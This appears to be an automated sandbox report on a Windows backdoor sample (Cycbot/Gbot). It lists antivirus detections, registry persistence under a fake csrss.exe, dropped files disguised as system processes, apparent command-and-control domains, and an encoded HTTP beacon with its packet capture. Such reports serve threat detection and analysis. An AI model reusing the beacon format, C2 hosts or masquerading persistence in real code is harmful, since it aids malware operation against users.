Analysis Date2015-01-17 20:32:43
MD5507cbcc845b83a05b66e315f115d7a0d
SHA1cb932d37ab15115de69f9a55aea476dd1378e091

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: f1400c324c4a6ed42d6e3809896b5961 sha1: 883b4d8f90a37475f936f22d7e9129e697dfa30d size: 106496
Section.rdata md5: cd95f81b3c089a585d584b7e96c0dbe4 sha1: 589a1cb5e3eee00419c1faf5c497833330ef04c0 size: 2048
Section.data md5: 583229f90e87586903b51e08d6b0c498 sha1: 6e513dbbb9b0129a192152669eb6a15a571e810e size: 68096
Section.isete md5: 08dd0b80fb4964eff56f358728b68cc2 sha1: d6693b25cd6c2a72faeb8774339ff3ea192149eb size: 1024
Timestamp2005-10-18 12:33:58
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1110
PEhashf4b074830e1347d21f964550f1fd55133dde21c2
IMPhashce7366088dcbc42f256e351f22de22a6
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.G.gen!Eldorado
AVAvira (antivir)BDS/Gbot.aida
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-316
AVDr. WebBackDoor.Gbot.21
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.LZI
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.G.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Cryptic.CMZ
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.aid
AVMalwareBytesTrojan.Agent
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbigmusicarchive.com
Winsock DNSguitarvideoshool.com
Winsock DNS127.0.0.1
Winsock DNSrealsoftwaredevelopment.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSrealsoftwaredevelopment.com
Type: A
104.28.8.83
DNSrealsoftwaredevelopment.com
Type: A
104.28.9.83
DNSguitarvideoshool.com
Type: A
DNSbigmusicarchive.com
Type: A
HTTP GEThttp://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif?v72=68&tq=gKZEtzyXj4%2FGT3azO56du%2BwjjO5ewpj02%2Bwq1d%2F6QtpmQiqLsqB5InZC7ioRV%2BY%2BhqlfnbGg16PWfZWQFsUvU2P4PB2oQSNHJcJAQ0%2BwbF39IFlpgo9ncTbtoTrKoPJ657n45PwTJ4qERNh%2FFECInmFINAPglcW92vGspUjwH5wTEYQ59qs7%2BXUyHwpRQg64KgtHorhweyRRoQ8APADnoOSSdLCGvF%2BV82lv%2B8w7VJVmGcr7DwO1tzFRX5imNyq5UZ2M0vZ40oD7lkmTigXMVu2W9iRavPGObyoIRskQE2l4NQ
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 104.28.8.83:80

Raw Pcap
0x00000000 (00000)   47455420 2f57696e 646f7773 4c697665   GET /WindowsLive
0x00000010 (00016)   57726974 65722f77 65622d32 5f305f74   Writer/web-2_0_t
0x00000020 (00032)   68756d62 5f312e67 69663f76 37323d36   humb_1.gif?v72=6
0x00000030 (00048)   38267471 3d674b5a 45747a79 586a3425   8&tq=gKZEtzyXj4%
0x00000040 (00064)   32464754 33617a4f 35366475 25324277   2FGT3azO56du%2Bw
0x00000050 (00080)   6a6a4f35 6577706a 30322532 42777131   jjO5ewpj02%2Bwq1
0x00000060 (00096)   64253246 36517470 6d516971 4c737142   d%2F6QtpmQiqLsqB
0x00000070 (00112)   35496e5a 4337696f 52562532 42592532   5InZC7ioRV%2BY%2
0x00000080 (00128)   4268716c 666e6247 67313650 57665a57   BhqlfnbGg16PWfZW
0x00000090 (00144)   51467355 76553250 34504232 6f51534e   QFsUvU2P4PB2oQSN
0x000000a0 (00160)   484a634a 41513025 32427762 46333949   HJcJAQ0%2BwbF39I
0x000000b0 (00176)   466c7067 6f396e63 5462746f 54724b6f   Flpgo9ncTbtoTrKo
0x000000c0 (00192)   504a3635 376e3435 5077544a 34714552   PJ657n45PwTJ4qER
0x000000d0 (00208)   4e682532 46464543 496e6d46 494e4150   Nh%2FFECInmFINAP
0x000000e0 (00224)   676c6357 39327647 7370556a 77483577   glcW92vGspUjwH5w
0x000000f0 (00240)   54455951 35397173 37253242 58557948   TEYQ59qs7%2BXUyH
0x00000100 (00256)   77705251 6736344b 6774486f 72687765   wpRQg64KgtHorhwe
0x00000110 (00272)   7952526f 51384150 41446e6f 4f535364   yRRoQ8APADnoOSSd
0x00000120 (00288)   4c434776 46253242 5638326c 76253242   LCGvF%2BV82lv%2B
0x00000130 (00304)   38773756 4a566d47 63723744 774f3174   8w7VJVmGcr7DwO1t
0x00000140 (00320)   7a465258 35696d4e 79713555 5a324d30   zFRX5imNyq5UZ2M0
0x00000150 (00336)   765a3430 6f44376c 6b6d5469 67584d56   vZ40oD7lkmTigXMV
0x00000160 (00352)   75325739 69526176 50474f62 796f4952   u2W9iRavPGObyoIR
0x00000170 (00368)   736b5145 326c344e 51204854 54502f31   skQE2l4NQ HTTP/1
0x00000180 (00384)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000190 (00400)   636c6f73 650d0a48 6f73743a 20726561   close..Host: rea
0x000001a0 (00416)   6c736f66 74776172 65646576 656c6f70   lsoftwaredevelop
0x000001b0 (00432)   6d656e74 2e636f6d 0d0a4163 63657074   ment.com..Accept
0x000001c0 (00448)   3a202a2f 2a0d0a55 7365722d 4167656e   : */*..User-Agen
0x000001d0 (00464)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x000001e0 (00480)   0d0a                                  ..


Strings
.O..
.g...8.#...
OF...Z
.#.....
<.p.
.
.HU...4Z..0k..f...0.
...
.
TgK
....2
...
.....qM..KX
0.............Q'....
.
.
.@...o}
\.E.C.
...
..
.
:

040904b0
"@0F
1.0.0.3
1110
bGB`
FileVersion
gQ R
jjjjjj
PrivateBuild
ProductVersion
qP@fa
rDas
Rr#"
S#&S
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
0mL]ne>B
>1V1&n.
1Z>s`[
2e3K<sC
2:m`S+
2V>mvwVe_
3,["f.0
3^kCWQ7aq[*
4b*?h+
4cv y9
"?|4O'
5A,\p?
)5N=)v@
63w:(Z
6*ad :
;6Ujy<
7,&bGH
7Z}olW
91hT3ADi
_94wc+
@9@`%Eh
9k8ZNJ
9l*	U`Y1I
9(zLL;N
?~AAX#
ADVAPI32.dll
ah+)v@! V:'
?AQdJW
aT'/> 
a=w{dW
{ Ayjcz"
/?bEHD
BO]|kH
#:);|C
C4b<=}&
C?'ed$
CharNextW
CharUpperW
<cNU8w
CoCreateInstance
CoInitialize
coPd-e-
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CoUninitialize
C?=pzv
CreateFileMappingW
CreateStdAccessibleObject
C(TdKO|
D4sATKx
@.data
DispatchMessageW
.^D}m!
^'dM'b
d!`}nY
DpnR\=
DuI5.%
DwRA=v
;e0cM8
EI1y$E5\
EnumResourceNamesA
e@yf_5
\f$70XN
FillConsoleOutputCharacterA
FindClose
!FOs\Y
FreeEnvironmentStringsW
G?3.KmGx
g7duC(S_
GetACP
GetCPInfo
GetLastError
GetMessageW
GetModuleHandleW
GetProcessWorkingSetSize
GetTickCount
GlobalAlloc
GlobalFree
+G\oo&
Gs	k>f
H.go|D}
hl-bC##
hN4`s<
}HyK 	
If[ok,T
InitializeCriticalSection
I`P){d
ISC6/=iJ
.isete
Ivvn-G
*:`}(J
J>	F3{k
?(j;K%_}
jld6 +
JM:C5$!
j}mIV9
jxU%i<
?/^K%[
k2mqs4
KERNEL32.dll
kH#hm^
$KI);F
KillTimer
kX)\J2
lL3NonS
LockResource
LresultFromObject
lstrcmpiW
lstrcpyA
lstrcpyW
lstrlenW
M4)+~~
M4x0O<
~m:+Oz
MultiByteToWideChar
My:k?U
N33ZwH
NC	bFQJ
n^\-i[nm6
_n^Npfw
?nv(kf
}ofi:]
[OIwYE
oJgFm^
ole32.dll
OLEACC.dll
O	uhx;
OutputDebugStringW
PathCombineW
PathFileExistsW
~)PFk05
pG$],"
PiCnw\w
P;{MY&DV
PostThreadMessageW
puF)i8
`Q]5e5
q95G}q
qayz^1
q_"W }
%q}xzx
Qye6wD
'\r&0;
`.rdata
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegDeleteValueW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegSetValueExW
_	s ~!
=.}[S78
SendMessageA
SetTimer
SHLWAPI.dll
S'oWCC2
SP5%Ky
Sp5QmR
StringFromCLSID
StringFromGUID2
'szeM#
t0#<D$2t
{#<t5f
!This program cannot be run in DOS mode.
T~nVSMs@
TranslateMessage
<Tv2.r
tYb~P[
.$U3KM9
uA7aYz
UnregisterClassA
USER32.dll
@U"Z^=
V3`zf47
,V?,fe;%X
v_i?p3#
VJcTJV)
[Vn/YiU
VV#Ae^03
vvt)P>=
Vx08f4}/
>W6O|0
WideCharToMultiByte
WL#M_m
wsprintfW
W\s_.Z
-/WzxP
x4firf
|XQ>~4gi
xTTyle
Y_;\6k
Y<c!a\
YH}A?kJr
Ys1LpF
@ytD^7z4
YUF3 ,
y{YTa5
zi;?}:
`ZJSSN
=zJVg,
^z\~kU@
ZKY7O=
zqcNp~
ZteCqTE}T